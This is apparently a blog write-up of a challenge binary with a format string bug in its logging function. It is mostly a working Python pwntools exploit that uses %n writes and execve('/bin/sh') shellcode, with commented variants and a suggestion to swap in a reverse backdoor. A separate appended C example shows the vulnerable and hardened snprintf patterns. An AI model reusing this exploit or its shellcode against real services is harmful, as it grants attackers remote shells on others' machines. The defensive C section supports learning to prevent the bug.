You can get the binary file here.
I think it's a funny program. Someone predicted that 2012 would be the last year of the Earth, but that was wrong.
This program's function is related to that, and I thought it was a funny idea.
Anyway, this program has a format string bug (FSB) in fnprintf, so you can easily crack it. I used a Python script to do that:

from pwn import *
import time
# dup2(4) as our socket is fd 4
shellcode = '\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45375c'+'%n'+'%22167c'+'%n'+'\n'
shellcode += "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"
#shellcode += "\x31\xc0\x31\xdb\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xb3\x04\xcd\x80\x75\xf6"
# /bin/sh polymorphic
#shellcode += "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81"
proc = remote('localhost', 23456)
print proc.recv(1024)
#print proc.recv(1024)
proc.sendline(shellcode)
time.sleep(5)
proc.interactive()

If you change the line shellcode += "\x90"*40+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n",
you can pwn it. You can change it to a reverse backdoor or other shellcode.
I can't understand why I can only get a shell in gdb.
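For reference, the bug class behind this writeup from the defender's side, as an added example that is not code from the original post or from the challenge binary: a logging helper that passes the client's text as the format argument (the FSB pattern), beside the corrected call, plus a small audit helper. The function names and the sample message are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define LINE_MAX_LEN 128

/* Vulnerable pattern (the bug class from the post): the client's text is
 * passed as the format string itself, so every '%' directive in it is
 * interpreted by the printf family. gcc -Wformat-security flags this. */
int log_vulnerable(char *out, size_t n, const char *msg) {
    return snprintf(out, n, msg);
}

/* Hardened pattern: fixed format, client text is only ever a "%s" argument.
 * '%' characters in msg are copied literally and never interpreted. */
int log_hardened(char *out, size_t n, const char *msg) {
    return snprintf(out, n, "%s", msg);
}

/* Audit helper: returns 1 if s contains any conversion directive other than
 * the escaped "%%". Useful for flagging data that reaches a format argument. */
int has_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }  /* literal percent, harmless */
        return 1;
    }
    return 0;
}

int main(void) {
    char buf[LINE_MAX_LEN];
    /* Constructed input: "%%" is the only directive that is safe to feed
     * the vulnerable version, and it is enough to show the difference. */
    const char *msg = "progress: 100%% done";
    log_vulnerable(buf, sizeof buf, msg);
    printf("vulnerable: %s\n", buf);   /* progress: 100% done  (parsed) */
    log_hardened(buf, sizeof buf, msg);
    printf("hardened:   %s\n", buf);   /* progress: 100%% done (literal) */
    printf("directive in \"%%10x%%n\": %d\n", has_format_directive("%10x%n"));
    return 0;
}
```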